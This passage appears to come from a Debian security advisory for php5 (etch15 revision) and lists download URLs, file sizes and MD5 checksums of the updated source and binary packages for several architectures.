archives:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch15.diff.gz\n Size/MD5 checksum: 130902 27d7683a1388c69479b06ac1162e27a2\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch15.dsc\n Size/MD5 checksum: 1993 68d631a7860f0fc34516cc8bbf2938a5\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg.orig.tar.gz\n Size/MD5 checksum: 8431973 956486a588c577616a5008d185e84968\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0+dfsg-8+etch15_all.deb\n Size/MD5 checksum: 1044 a6e0b8f0547c74c498749d28dac8b92f\n http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.0+dfsg-8+etch15_all.deb\n Size/MD5 checksum: 312534 c5fb5dc9ccfe7dfaabce6c5f6f289549\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 5312 f2543060aaf1a8cb00a142d77c7d727f\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 55670 96ebda392780698ae80441a9021c8b4a\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 221226 9af42f2646efbe5c43482e9333e17bff\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 38922 8a9111577f3ea3021ea6e5d6b2021306\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 2487846 c371adc12b1ff1297a3b1dde1294eca3\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 70954 9f948ebf6a836d954a713f194703db84\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 4789370 31123ee20c392c73aeb5927077457e5c\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 2487508 7cf62cb8552389fc0fbb8197b7de3808\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 18612 a9322e7cbf565373df7bb13ede5b140e\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 2412536 a61c4e23f2b41757d8cd98f2c25e8f3a\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 40296 a7dc0d924077f01cc7341d5ab5592151\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 36648 4c4fac1064c51938b08d8ce444317503\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 13386 7df621f308e5be601693a14ad147cfc2\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 19602 05da76fefb3435a6dc6d1a1d3cc05da9\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 24966 968d6f231c862b7261f2f7e29bb1f297\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 4952 a77709bc4600faeec75f63597c6333aa\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 11844 229ca7db558bdc823c1802dc5399f422\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 17548 1fcb3438c69905237c89957d5491a6b5\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 36114 5582c32c8c44bdebfe6e4fae73e0a3f6\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 9054 8e1e0de6fe55bda2f749197f1c4177ad\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 13474 976cc49b0a93a751ee785a93aa3ee5d1\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 36510 3403d24592323e28561d05eb0299110f\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_alpha.deb\n Size/MD5 checksum: 345330 8a5701ec09bbb5b03ac2f543f4320452\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 38588 90097351de2bac5c6e11a4f7fb5ec73d\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 19438 f80699a3c7592b7c38f50af56eeeb957\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 345976 51b9e65a337166cdb1125549580abf89\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 2379548 0b47996fb2a5944fd22ab8b65cf4c722\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 36416 3ace3d84f12b5a8e83248e738fcb706e\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 24994 5fbbeb2537f4876d7a516464d510173a\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 9404 1fdbf3acbf72ef317428fe4f60485882\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 5266 39eff740288549e5d8ea1cdce0c5f85b\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 53952 94aae1cea47eb7b61be1800e011a93b9\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 36726 5c0f91b30760d8512384c0f68dc2bf21\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 4904 4bb26c59f0c29152d7d62dd048b25bb2\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 39166 9f9aea8b4be57aad3d2eda043e190c03\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 12062 c4e5fd6ba704945b175c410a4b728672\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 71674 c547292c0a0d6da49953e1001db139d8\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 37124 99d582300b639a7db1b781ce76a28738\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 13030 7776dbf0c8a27a45fb358f2bb6c2f7f9\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 2434624 913d144ced4d3cbcbfd55361f60fe791\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 17570 1d72cf93b65af6c999e443e656531123\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 18670 c24afd04176a516986910ab36e612f3c\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 13494 4a7e7dd3e7e2b86097b9494bfa4dcec9\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 4718800 7d29d3f231affd34e79719346d075327\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 46630 ce7e64f8aa10fbc1f40149fcbd40f6e0\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 218482 294541ab5286e92e2895931547a4015e\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_amd64.deb\n Size/MD5 checksum: 2433932 aad636fd27d8f7d7575d5ff3b89dce3f\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 24088 139529fe838c8cd016eff13e025436a1\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 2311092 61d8a0de6eb125ad57fdad955fb35876\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 17090 47014280f104d578718f7582bcf055d4\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 10934 76b74a1ccc9eea4c8756859e9479eb47\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 4575698 56703045b95644440f032a798c879607\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 33654 0663eee52f40ac47d681447b9d488fe5\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 2304346 c5cff8448c9b6c98825435d27b3dbcea\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 63830 055eea0ef9ba6d30329a1f9326dbfe6f\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 4646 a4ed1f4addda690552985021b9b0501d\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 17942 300b0e8b66a21790c6ed79021e8d6572\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 33746 1f14e9713631c01d081cd94039a38cd4\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 4870 32f28ba8771fa1fdb005482d8b7eca65\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 33686 ecb6721d6082a5584b292a0d39f5f9cf\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 15840 8061206023b9effb8f0806d0113455bf\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 33662 c8049500843ff9cbcc0157a65f4bf3a4\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 8760 d21592b925ae39243ef58a26cb293d92\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 216574 182a35a7328d9379e2cf6ef2e5451c99\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 2310394 fc702e479a5a57b70b33d70edd71e980\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 49276 69e707fc653c7d8d3fded5839f30734c\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 344728 f0344af40e52b2b0a02da44c6a23a3b7\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 33026 b2da33b4b6be1a07758ba7b48634e46f\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 12452 fb64792d2924c2b5288b78941769ff78\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_arm.deb\n Size/MD5 checksum: 11872 3310a036b1c05e62407b605d41be42e4\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 2636602 1d4280efa2bea1c4ff0eb2214a2dd36e\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 75410 4489680360a0027fdb180613e0758078\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 20318 6acbf7623ccbeec417d6c2cd3ca1a50a\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 58134 1f3af80512a5d21c2f5299ab8a4d0948\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 9744 505d36dd1dcdc1ed0c92d9457608e1eb\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 5035620 764abcfbbd604c819204adfa710a91a1\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 12560 cf0b5fdb8cc13b3d35512ed3dffe9b04\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 224002 3df6d6779e738add334fecda3a669d50\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 2537952 0eea042d04ef0d9d5daca907fb115f36\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 2636478 522401c79c6564057fe9d5eedf7cc135\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 42130 6edae2743fd4d85230e9df3a74d8811f\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 39992 fe7ed8416cf8dcf95f674f06375fab4f\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 38268 1e812f8225b53862d728d440c6a7947c\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 5500 bcb747a022f9c6f59fad63574f1f7bc9\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 346676 3f09913be9599bfc49fe8487d7e32560\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 28248 67db4600ec126a7b87fa7a2f6f600109\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 21124 9a0dee178d99a85699a7666d81ae1bc6\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 5820 cd5b6df44213c036235b71bc436753eb\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 15546 18ef0779da3a390439b41c7148e1c1c0\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 14102 f39ff27986b250ce0308d358956e9d09\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 39548 28ddbae4b7c8b4b385d5bbee109759d6\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 40968 1ad6327a6d6da549ee8fbd3640abbfc7\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_hppa.deb\n Size/MD5 checksum: 19592 e0f5341cdffb177d8fad92367f884b05\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 2339206 24952846b1f59700d9fc3eb7eda593b8\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 34086 1283e885c115d0961e0b9bd1dfb50335\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 18384 6fe9fe930101234fd8ed633282836d97\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 12818 ae6b2666d55ee3d71e937bad4cdf0509\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 4766 857beffe74346879511be8bcaa3d937d\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 34460 6c8956b10463043b95f6d61f47a1c0ed\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 8622 bb7757c392c46dd57205db363c48956e\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 11298 457bc1fa3b3cd4b18634fc31f430da10\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 4612770 5297c410089bd79e5273f54e61a95c7c\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 2339536 ce82b2daf6088d3bf06c244270ef1ad3\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 36452 e23cdeea5fb3e7df0dd0cc5613d35f5b\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 33528 e73d034a8f817960ebee7bfed883cfd3\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 12252 aaa909c8c6f9fc4574dafae706f6dbfb\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 215532 8eaaf77fb9f14f518c4205032fe27fb3\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 5044 7df43dcab59897a4d7608e5df8fd8142\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 50698 17441dce657d1e87468a9cf33e680c28\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 24466 9bcd0e50b57bb267cc935b9d6f23b72b\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 16464 c3527acc4fc312a727d8fcc126275532\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 64864 7621b979e84c5c6eb05d7c59df78edb9\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 2324852 c890a001de3c22548d64a2d139972af3\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 44384 88eede96bb9b95cf92b185375a0d7df3\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 17230 2110c3fa04b3472e007f7912b63dc99a\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 346094 539d27179093a56eea2a778503e4ab89\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_i386.deb\n Size/MD5 checksum: 34542 a71392dfe59e096dfe1b66c7b7609cb8\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 342160 e6eff7c4291c8ea3dcac884e7f8806ed\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 34404 80e5043247dd32ea06ea79a512ae1110\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 17764 4471890b779b393eee26cff018dc3ac4\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 76614 1215248075f451832c6394937a1f679c\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 54516 6e54cd43ef8e8fc02b7333d9b6f7b164\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 25084 12f75ac1de0efa710deddcc09d4af92e\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 6140 c8144d6ecc95119158876e657392829b\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 54672 81cb800a37f35635e6de6b3c51fef2f9\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 6494 e309a1a419f33a87320819934045e163\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 50646 3c9f5bd7da07053000937eccacbf263e\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 3197862 b5b20854ae8d05ea4f17e9a5b62a2b15\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 235830 052a058da72b25c4c466b477c5e23f43\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 50238 98e0f5f276a683a24a8b675a1f0c8b39\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 17550 861a357ce4f6f84f13357b0d4a83ec89\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 12008 1ca7c135bac7e8f150440faa608594ee\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 3151408 a3f8099d8fd1eaa468f29f6b5cf64638\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 6259170 87aa402d5bbd1d569a1f2505f99c17e1\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 95628 2ee174b8ad8a57f9c22bc82834c586c0\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 3199180 f5ab4ba24bfee5893a9678c383dec1e8\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 24860 981b166670ec4db54249364253bfdaf2\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 48398 b0e340d43ba129404179531374e1f6cd\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 27146 4023c1b6cd5892e1ad34b393deb307eb\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_ia64.deb\n Size/MD5 checksum: 15432 cf872de4cb705f70390974abc98d4708\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 31606 8dad9676d8dcc418e7e3c3ce9981897c\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 8278 42017d4bacb172c87e357963736bdd0f\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 49504 2c52f40ddd8288ec3c02c706ec33bff9\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 63870 36fd776109f1d0f2638dc3d7d56c312c\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 2414420 f9ea9a79dea86f4130a82f9ce89ab360\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 4736432 82bf779a2153573b1719241855c6b0a7\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 15736 947c8434695bc5e644c28c8424011b49\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 12472 bb7c7775c6a9894d89adab19f2653eed\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 32766 12de93032df13f057bb167c1c830c07f\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 35260 e8db5f85f2e8072e0c711f21fbb7c9f1\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 2388138 ec4c08d36c9080e566120c7ed6c0dd65\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 18504 fdf8cd94cacff491ed1fed5000c94ea7\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 33180 57028bd8f7813d69bd3d8d06126a3fe9\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 5244 30460c36a670637a4df98d79dcf587fb\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 35604 6561405e37bd4442c2ddc62d9f05f332\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 217186 0a4655619e3eb5e2ee4886b223b8e5aa\n 